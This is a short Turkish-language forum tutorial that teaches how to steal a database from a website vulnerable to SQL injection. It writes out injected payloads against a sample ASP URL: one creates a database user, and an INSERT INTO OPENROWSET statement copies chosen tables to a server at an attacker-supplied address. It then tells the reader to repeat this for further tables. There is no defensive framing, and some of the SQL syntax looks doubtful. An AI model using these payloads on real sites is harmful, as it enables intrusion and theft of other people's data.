sa arkadaşlar şimdi size sql injection açıgı olan sitenin
db sini transfer etmeyi göstereceğim.
basit [Microsoft OleDb Sql]
site.com/ss.asp?parametre=1
ilk önce user yaratacagız.
;CREATE USER al3m IDENTIFIED BY ‘murat10’
tabi bu gomut access oledb lerde geçerli.. onuda belirtmekte
fayda var.
‘; insert into
OPENROWSET(‘SQLoledb’,
‘uid=al3m;pwd=murat10;Network=DBMSSOCN;Address=ipadres,80;’,
‘select * from databasem..tablo1’)
select * from database..tablo1 —
şeklinde istedigniz tablodaki verileri transfer edebilmektesiniz.
aynı şekilde tablo1 i 2 yapıp 2. tablodakileride çekebilirsiniz.
Alıntı degiLdir.